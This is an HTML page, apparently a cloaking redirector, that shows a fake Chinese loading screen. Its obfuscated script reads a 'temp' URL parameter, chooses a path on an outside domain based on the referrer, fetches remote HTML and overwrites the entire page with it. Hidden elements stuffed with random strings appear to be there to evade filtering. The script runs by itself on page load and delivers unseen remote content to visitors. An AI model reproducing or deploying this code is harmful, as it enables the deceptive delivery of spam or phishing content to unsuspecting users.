<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .QfAWk5cnGF {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .QfAWk5cnGF .pL9nBv {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .QfAWk5cnGF .content {
            line-height: 50px;
            text-align: center
        }

        .QfAWk5cnGF .img {
            width: 100%
        }

        .QfAWk5cnGF .aeW4w3be {
            text-align: center
        }

        .QfAWk5cnGF .aeW4w3be span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .QfAWk5cnGF .aeW4w3be span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .QfAWk5cnGF .aeW4w3be span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .QfAWk5cnGF .aeW4w3be span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .QfAWk5cnGF .aeW4w3be span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .QfAWk5cnGF .aeW4w3be span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .QfAWk5cnGF .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Vtenw6vBX(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var LF2D2g = Vtenw6vBX('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ LF2D2g +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ LF2D2g +".html?a=share";
		}
		
        r7OmcX=url+"#"+new Date().getTime();
        r7OmcX && function() {
            $.get(r7OmcX, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >Ydv9LVRPKrJ</b>
<li style='display:none' >HugV1wPYteVszmVSJPOaTDPFpaGURAn1AobzwOLkdN37BEBuZVmOiLhKZplT0AY0tFaMQoPCpgwrx3HXLic1QwgcDh</li>
<li style='display:none' >HugV1wPYteVszmVSJPOaTDPFpaGURAn1AobzwOLkdN37BEBuZVmOiLhKZplT0AY0tFaMQoPCpgwrx3HXLic1QwgcDh</li><div class="QfAWk5cnGF">
    <div class="pL9nBv">
        <div class="aeW4w3be">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>lg0LFK3RHMhziYIIzSCUJyzbL5lESnyi1XyFxjjlJM7ivDT</p>
<h1 style='display:none' >jF5fYoKbPs8eWs</h1>
<span style='display:none'>EnPSuKIw0HniUY7lOt3juggOyOoFcGJc4ZMwsWjQTuJe0HE8jMHc8fj2kZqbZBvL3ebJVRcjzaevSVVQaRpkc5jTTt</span>
<img  src='' style='display:none'>
<b style='display:none' >R3cVA5P07J4d9raHmLzfGp6s0S9NdDYu8IWINyfgkYJGzwNf3XruojX4WXDJLSDl9UH</b>
<img  src='' style='display:none'>
<b style='display:none' >R3cVA5P07J4d9raHmLzfGp6s0S9NdDYu8IWINyfgkYJGzwNf3XruojX4WXDJLSDl9UH</b>
<ul style='display:none' >Qq8zXFv9PRQ7TFYPIUdnkvyyXLQN939Sd2Sgbx1xN69066h5gH0N5tOMBZIqZ4BkzYmCuwzWmiDbv</ul></body>
</html>